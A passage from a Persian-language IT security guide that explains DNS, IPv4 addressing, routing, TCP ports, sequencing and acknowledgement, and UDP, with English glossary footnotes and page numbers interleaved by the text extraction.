.۹ﺍﮔﺮ ﺩﻭ ﻛـﺪ ﺩﺭﻫـﻢﺳـﺎﺯﻱ ﺑﺪﺳـﺖ ﺁﻣـﺪﻩ ﻳﻜـﺴﺎﻥ ﺑﻮﺩﻧـﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﻳﺎﺑﻴـﺪ ﻣـﺘﻦ ﺍﺭﺳـﺎﻟﻲ ﺗﻐﻴﻴـﺮ ﻧﻜـﺮﺩﻩﺍﺳـﺖ ﻭ
ﻓﺮﺳﺘﻨﺪﻩ ﻧﻴﺰ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻴﺪ.
١١١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ
١٤٧
ﭼﻮﻥ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻃﻮﻻﻧﻲ ﺍﻋﺪﺍﺩ ﺳـﺨﺖ ﺍﺳـﺖ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ )ﻛﻪ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ
ﻧﺎﻣﻴـــﺪﻩ ﻣـــﻲﺷـــﻮﻧﺪ( ﻧﺎﻣﮕـــﺬﺍﺭﻱ ﺷـــﺪﻩﺍﻧـــﺪ .ﻧﻤﻮﻧـــﺔ ﺁﻥ
www.infodev.orgﺍﺳﺖ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮ
ﻭﺏ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲ ﺧـﺎﺹ ﺑﻨـﺎﻡ
DNSﺍﺭﺳﺎﻝ ﻣﻲﻛﻨـﺪ DNS .ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺮﻭﻑ ﺍﻟﻔﺒـﺎ ﺭﺍ ﺑـﻪ
ﺷﻤﺎﺭﻩ ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﺪ )ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺷﻤﺎﺭﻩ ﻣﻮﺭﺩ ﻧﻈﺮ 192.86.99.121
ﺍﺳـﺖ( .ﻫﻤﭽﻨﻴﻦ DNSﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ
ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺟﺎﺑﺠـﺎ ﺷـﻮﺩ؛ ﭼـﻮﻥ ﺩﺍﻣﻨـﺔ ﻣﺮﺑﻮﻃـﻪ
ﺁﺩﺭﺱ ﺟﺪﻳــﺪ ﺭﺍ ﺑــﻪ DNSﺍﻃــﻼﻉ ﻣــﻲﺩﻫــﺪ ﻭ ﻟــﺬﺍ ﻛــﺎﺭﺑﺮﺍﻥ
ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﻤﺎﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ.
١٤٨
ﺿﻤﻴﻤﺔ ۲
TCP/IP
:IPﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ
١٤٩
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑـﻪ ﺷـﻜﻞ
ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﻧﺸﺎﻧﻪ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺑـﺴﺘﻪ
ﻳﺎ datagramﮔﻔﺘﻪ ﻣﻲﺷـﻮﺩ IP .ﺩﺭ TCP/IPﺑـﻪ ﻣﻌﻨـﺎﻱ
"ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ ﻭ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻗﺎﻟـﺐ ﺩﺍﺧﻠـﻲ
ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺎﺷﺪ .ﺑﺴﺘﺔ IPﺷﺎﻣﻞ ﭼﻨـﺪﻳﻦ ﺑﺨـﺶ
ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﺁﻥ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﻧﺪ:
١٥٠
ﺁﺩﺭﺱﺩﻫﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﻫﺮ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ IPﻣﻲﺑﺎﺷﺪ .ﺍﻳﻦ ﺁﺩﺭﺱ
ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻥ ﺍﺑﺰﺍﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨـﺪ؛
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﺁﺩﺭﺱ ﺧﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧـﺴﺨﺔ ﺟـﺎﺭﻱ TCP/IP
)ﻛﻪ ﺑﻪ ﻧﺎﻡ IPv4ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻋﺪﺍﺩ ۳۲ﺑﻴﺘﻲ ﺩﻭﺩﻭﻳﻲ ﻫـﺴﺘﻨﺪ.
ﻳﻌﻨﻲ ﺗﻌﺪﺍﺩ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻤﻜـﻦ ۲۳۲=۴۲۹۴۹۶۷۲۹۶ ،ﻣـﻲﺑﺎﺷـﺪ.
ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺳﺎﺩﻩﺗـﺮ ﺁﻧﻬـﺎ ،ﺍﻋـﺪﺍﺩ ۳۲ﺑﻴﺘـﻲ
ﺩﻭﺩﻭﻳﻲ ﺑﻪ ۴ﺑﺨـﺶ ۸ﺑﻴﺘـﻲ ﺗﻘـﺴﻴﻢﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻧـﺪ .ﭼـﻮﻥ
۲۸=۲۵۶ﺍﺳﺖ ،ﻫﺮ ﺑﺨﺶ ۸ﺑﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻋﺪﺍﺩ ۰ﺗـﺎ
ﻻ ﺑﺪﻧﺒﺎﻝ ﻫﻢ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑـﺎ ﻳـﻚ
۲۵۵ﺑﺎﺷﺪ .ﺍﻳﻦ ۴ﺷﻤﺎﺭﻩ ﻣﻌﻤﻮ ﹰ
ﻧﻘﻄﻪ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺗﻔﻜﻴﻚ ﻣﻲﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﻮﭼﻜﺘﺮﻳﻦ ﺁﺩﺭﺱ
ﺍﻳﻨﺘﺮﻧﺘــﻲ 0.0.0.0ﻭ ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺁﻥ 255.255.255.255
ﺍﺳﺖ .ﻧﻤﻮﻧـﺔ ﻳـﻚ ﺁﺩﺭﺱ IPﺑـﻪ ﺷـﻜﻞ 24.200.195.15
ﻣﻲ ﺑﺎﺷﺪ .ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺑﺰﺍﺭﻱ ﺑﻨﺎﻡ ﻣﺴﻴﺮﻳﺎﺏ ١٤٦ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ
ﻣﺴﻴﺮ ﻫﺮ ﺁﺩﺭﺱ IPﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻣﻲﺩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ
ﺩﺳﺖﻳﺎﻓﺘﻦ ﺑﻪ ﻫﺮ ﺁﺩﺭﺱ ﺑﺎﻳﺪ ﻛﺪﺍﻡ ﻣﺴﻴﺮ ﺭﺍ ﺑﺮﮔﺰﻳﺪ.
146 Router
•
ﺍﻧﺪﺍﺯﺓ ﺑﺴﺘﻪ؛
•
ﺁﺩﺭﺱ IPﮔﻴﺮﻧﺪﻩ؛
•
ﺁﺩﺭﺱ IPﻣﺤﻠﻲ ﻛﻪ ﺑﺴﺘﻪ ﺍﺯ ﺁﻧﺠﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ؛ ﻭ
•
ﻧﻮﻉ ﺑﺴﺘﻪ.
ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻳــﻚ ﺑــﺴﺘﻪ ﺍﺯ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺍﺭﺳــﺎﻝ ﻣــﻲﺷــﻮﺩ ﺑــﻪ
ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻣﺴﻴﺮﻳﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺁﻥ ﻧﻴﺰ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ
ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﺑﻌﺪﻱ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ ﺍﻳـﻦ
ﻛﺎﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﺑﺮﺳـﺪ .ﺍﮔـﺮ ﻣـﺸﻜﻠﻲ
ﺑﻮﺟﻮﺩ ﺁﻳﺪ ﻳﺎ ﺗﺮﺍﻛﻢ ﺑﺴﺘﻪﻫﺎ ﺯﻳﺎﺩ ﺑﺎﺷﺪ ﺑﺴﺘﻪ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺳـﺎﻝ
ﺷﻮﺩ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ ﺑـﻪ IP
ﭘﺮﻭﺗﻜﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ١٥١ﻣﻲﮔﻮﻳﻨﺪ .ﺍﮔﺮﭼـﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ
Domain Name Services
Hostname
Internet Protocol
Packet
Unreliable Protocol
147
148
149
150
151
ﺑﺨﺶ ﺩﻭﻡ
ﭘﺮﻭﺗﻜــﻞ TCP/IPﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ﺍﺳــﺖ ﻛــﻪ ﺗﻤــﺎﻡ
ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ .ﺍﮔﺮﭼـﻪ ﻧﻴـﺎﺯﻱ
ﻧﻴﺴﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺭﺑـﺎﺭﺓ
TCP/IPﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﻜـﺮﺑﻨـﺪﻱ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺑﺪﺍﻧﻨﺪ .ﺩﺭ ﺍﺩﺍﻣـﻪ
ﺷﺮﺡ ﺳﺎﺩﻩﺍﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩ TCP/IPﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺎ ﺍﻳﻦ
ﻣﻔﺎﻫﻴﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻗﺴﻤﺖ ﺻـﺮﻓﻨﻈﺮ
ﻛﻨﻴﺪ.
١١٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
IPﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫـﺎﻱ
ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﺎﻧﺪ.
ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ
ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﻪ ﺩﻭ ﻧﻮﻉ ﺍﺯ ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ ﻣـﻲﻛﻨـﻴﻢ TCP :ﻭ
.UDP
:TCPﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ
١٥٢
TCPﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﭘﻴﺎﻣﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺷﺎﻣﻞ
ﻭﺏ ) ،(HTTPﭘﺮﻭﺗﻜـــﻞ ﺍﻧﺘﻘـــﺎﻝ ﻓﺎﻳـــﻞ ) ١٥٣(FTPﻭ ﻧﺎﻣـــﺔ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﺑﺎﺷﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﺓ ﺍﺭﺳـﺎﻝﺷـﺪﻩ ،ﺑـﺴﺘﻪ ﻫـﺎﻱ
TCPﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻫﻢ ﻣﻲﺑﺎﺷﻨﺪ:
١٥٤
•
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛
•
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ؛
•
ﺍﻃﻼﻋﺎﺕ ﺗﺮﺗﻴﺒﻲ ١٥٦ﺑﺴﺘﻪﻫﺎ؛ ﻭ
•
ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ.
١٥٥
١٥٧
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻓﻘﻂ ﻳﻚ ﺁﺩﺭﺱ IPﺩﺍﺭﺩ ﺍﺯ ﺷﻤﺎﺭﻩ ﭘـﻮﺭﺕ
ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ
ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫـﺪ
ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﭼﻨﺪﻳﻦ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺑﺎﺯ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ
ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ
ﭘﻴﺎﻡ TCPﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺭﻭﻱ ﭘﻮﺭﺕ ﺻـﺤﻴﺤﻲ ﻣﻨﺘﻈـﺮ
ﻻ ﺑﺮﺍﻱ ﻫﺮ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﺧـﺎﺹ ،ﻳـﻚ
ﭘﻴﺎﻡ ﺑﻤﺎﻧﺪ .ﻣﻌﻤﻮ ﹰ
ﭘﻮﺭﺕ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﻭﺏ ﻫﻤﻴﺸﻪ ﭘﻮﺭﺕ ﺷﻤﺎﺭﺓ ۸۰ﺍﺳـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﭘﻨﺠـﺮﺓ
ﻣﺮﻭﺭﮔﺮ ﺭﺍ ﺑﺎﺯ ﻣﻲﻛﻨﻴﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻚ ﭘﻮﺭﺕ ﺭﺍ ﺑﺮﺍﻱ
ﺧﻮﺩ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﺪ )ﻃﺒﻖ ﻗﺮﺍﺭﺩﺍﺩ ،ﺑﺰﺭﮔﺘﺮ ﺍﺯ (۱۰۲۳ﻭ ﺍﻳـﻦ ﻫﻤـﺎﻥ
ﭘﻮﺭﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻈﺮ ﭘﻴﺎﻡ ﺍﻳﺴﺘﺎﺩ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﻮﻝ ﺑﺴﺘﻪﻫﺎﻱ IPﻣﺤﺪﻭﺩ ﺍﺳﺖ ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ
ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ
ﺑﻴﺸﺘﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ،ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻗـﺴﻤﺘﻬﺎﻱ ﻛـﻮﭼﻜﺘﺮﻱ
ﺗﻘﺴﻴﻢ ﮔﺮﺩﻧﺪ .ﻫﺮ ﻗﺴﻤﺖ ﺩﺭ ﻗﺎﻟﺐ ﺑﺴﺘﺔ TCPﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ
152 Transmission Control Protocol
153. File Transfer Protocol
154 Sending Port Number
155 Receiving Port Number
156 Sequencing Information
157 Acknowledgement Information
ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﻓﺮﺳﺘﺎﺩﻥ ﺗﺮﺗﻴﺒﻲ ﺍﻃﻼﻋﺎﺕ ﺳﺒﺐ ﻣﻲﺷﻮﺩ ﻛﻪ
ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﺍﻳـﻦ ﻗـﺴﻤﺘﻬﺎ ﺭﺍ ﺑـﺎ ﺗﺮﺗﻴﺒـﻲ ﺻـﺤﻴﺢ ﻣﺠـﺪﺩﹰﺍ
ﮔﺮﺩﺁﻭﺭﻱ ﻧﻤﺎﻳﺪ .ﺍﻣﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﻌـﻀﻲ ﺍﺯ
ﺑﺴﺘﻪﻫﺎ ﺳﺮﻳﻌﺘﺮ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ ﻭ ﺍﻳﻦ ﺑﺪﺍﻥ
ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺎﺭﺝ ﺍﺯ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ
ﺷﺪﻩﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﺷﻮﻧﺪ .ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ
ﻣﺎﻫﻴﺖ IPﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ
ﻫﺮﮔﺰ ﺑﻪ ﻣﻘﺼﺪ ﻧﺮﺳﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣـﻮﺭﺩ ﺑﺮﻧﺎﻣـﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﻣﺘﻮﺟـﻪ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺷﻜﺎﻑ ﻣﻴﺎﻥ ﺗﺮﺗﻴﺐ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫـﺎ ﺭﺥ ﺩﺍﺩﻩ
ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛـﻪ ﺑـﺴﺘﺔ ﮔـﻢ ﺷـﺪﻩ ﻣﺠـﺪﺩﹰﺍ
ﺍﺭﺳﺎﻝ ﺷﻮﺩ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻓﺮﺳﺘﻨﺪﻩ ﻳـﻚ ﺑـﺴﺘﺔ TCPﺑﻔﺮﺳـﺘﺪ ،ﺍﻳـﻦ ﺍﻧﺘﻈـﺎﺭ
ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺎ ﺑﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺍﻃﻼﻋـﺎﺕ
ﺗﺼﺪﻳﻘﻲ ﻣﺨـﺼﻮﺹ ،ﺩﺭﻳﺎﻓـﺖ ﺁﻧـﺮﺍ ﺗـﺼﺪﻳﻖ ﻛﻨـﺪ .ﺍﮔـﺮ ﭘﻴـﺎﻡ
ﺗﺼﺪﻳﻖ ﻳﻚ ﺑﺴﺘﻪ ﺩﺭ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻣﺸﺨﺺﺷﺪﻩﺍﻱ ﺑـﺎﺯ ﻧﮕـﺮﺩﺩ،
ﺑﺴﺘﻪ ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﻋﺪﺍﺩ ﺗﺮﺗﻴﺒـﻲ ﻭ
ﺗﺼﺪﻳﻘﻲ ﺑﺴﺘﻪﻫﺎ TCP ،ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ١٥٨ﺍﺳـﺖ ﻭ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ،ﻛـﺎﺭﺑﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺍﺷﺘﺒﺎﻩ ﻭ ﻳـﺎ ﺧﻄـﺎ ﺩﺭ
ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺟﺮﻳﺎﻥ ﺁﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ
ﮔﺮﻓﺖ.
:UDPﭘﺮﻭﺗﻜﻞ datagramﻛﺎﺭﺑﺮ
١٥٩
UDPﻗﺎﻟﺐ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻫﺮ ﺑﺴﺘﺔ UDPﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﻩﻫـﺎ ﺩﺍﺭﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ:
•
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ ﻭ
•
۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ.
ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ،TCPﺑﻪ ﺩﻟﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﭘﻮﺭﺕ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﺑﺘﻮﺍﻧﻨــﺪ ﺑﻄــﻮﺭ ﻣــﻮﺍﺯﻱ
